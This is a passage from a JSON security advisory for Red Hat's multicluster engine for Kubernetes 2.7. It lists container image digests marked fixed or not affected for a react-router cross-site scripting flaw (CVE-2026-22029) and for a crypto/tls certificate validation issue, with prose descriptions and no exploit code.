"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2026-22029",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-01-10T04:01:03.694749+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428412"
}
],
"notes": [
{
"category": "description",
"text": "A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
